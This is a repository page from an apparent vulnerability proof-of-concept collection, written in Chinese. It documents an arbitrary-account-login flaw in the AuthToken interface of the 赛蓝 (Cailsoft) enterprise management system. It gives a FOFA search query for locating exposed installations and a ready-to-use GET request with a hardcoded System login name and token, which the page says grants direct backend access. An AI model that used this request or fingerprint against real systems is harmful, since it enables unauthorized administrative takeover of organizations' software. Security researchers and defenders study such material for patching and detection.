admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
POC00/赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞.md
wy876 f228c4e964 8.1更新漏洞
2024-08-01 20:05:27 +08:00

587 B
Raw Blame History

赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞

赛蓝企业管理系统AuthToken接口存在任意账号登录漏洞该漏洞可直接登录后台。

fofa

body="www.cailsoft.com" || body="赛蓝企业管理系统"

poc

GET /AuthToken/Index?loginName=System&token=c94ad0c0aee8b1f23b138484f014131f HTTP/1.1
Host:

image-20240801195959160

image-20240801200007710